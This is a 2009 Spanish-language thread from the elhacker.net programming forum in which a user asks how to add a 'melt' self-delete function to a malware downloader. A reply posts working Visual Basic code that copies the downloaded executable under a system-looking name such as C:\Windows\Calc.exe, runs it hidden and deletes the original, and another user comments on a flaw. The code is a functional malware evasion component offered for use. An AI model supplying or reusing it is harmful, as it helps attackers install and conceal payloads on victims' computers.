elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Como poner Funcion Mel en Downloader?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Como poner Funcion Mel en Downloader?  (Leído 1,865 veces)
argorzack

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Como poner Funcion Mel en Downloader?
« en: 3 Agosto 2009, 19:48 pm »

Quisiera saber como podria poner la funcion Mel para que despues de ejecutar el archivo se autoborrara.
pero me refiero al archivo que descarga y ejecuta el downloader .

les agradeceria postearan el codigo o en su defecto algun source para poder comprovar el funcionamiento.




En línea

HaX991

Desconectado Desconectado

Mensajes: 33



Ver Perfil
Re: Como poner Funcion Mel en Downloader?
« Respuesta #1 en: 21 Agosto 2009, 00:15 am »


La funcion MELT la deberia llevar programada ya el archivo a descargar y cuando lo ejecutes se autoborrara sino tambien puedes hacer que el downloader haga la tarea.

Te pongo un codigo en VB:

Código
  1. Private Declare Function CopyFileA Lib "Kernel32" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
  2. Private Declare Function DeleteFileA Lib "Kernel32" (ByVal lpFileName As String) As Long
  3. Private Declare Function WinExec Lib "Kernel32" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
  4.  
  5. Private Function Melt(ByVal sEXEPath As String, byval sNewPath as string) As Boolean
  6. dim lRet as long
  7.      If sNewPath <> sEXEPath Then
  8.         lRet = CopyFileA(sEXEPath, sNewPath, False)
  9.         If lRet = 0 Then Melt = False: Exit Function
  10.      End If
  11.      '//Esta funcion se usa teniendo en cuenta que el archivos que se va a iniciar es una aplicacion,
  12.      '//para archivos de texto o fotos o otra cosa es "ShellExecute".
  13.      lRet = WinExec(sNewPath, 0&) '//0&= Seria el tipo de inicio (0=Oculto, 1=Normal...)
  14.      If lRet > 31 Then Melt = False: Exit Function
  15.      lRet= DeleteFileA (sEXEPath)
  16.      If lRet = 0 Then Melt = False: Exit Function
  17.      Melt = True
  18. End Function

El funcionamiento es el siguiente:

El programa copia el archivo descargado (sEXEPath) en la ruta donde la indiques, la ruta completa  (sNewPath) con el nombre del nuevo archivo tambien ejemplo: C:\Windows\Calc.exe, y despues lo ejecuta desde alli y borra el archivo descargado. Esto se haria de otra manera si se implementa en el codigo del archivo a bajar y no en el downloader.

Espero que te sirva!!!  :D


En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Como poner Funcion Mel en Downloader?
« Respuesta #2 en: 21 Agosto 2009, 16:00 pm »

@HaX991: Tu metodo fallara si intentes hacer Melt contigo mismo... osea... no puedes borrarte a ti mismo mientras no te cierres...
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines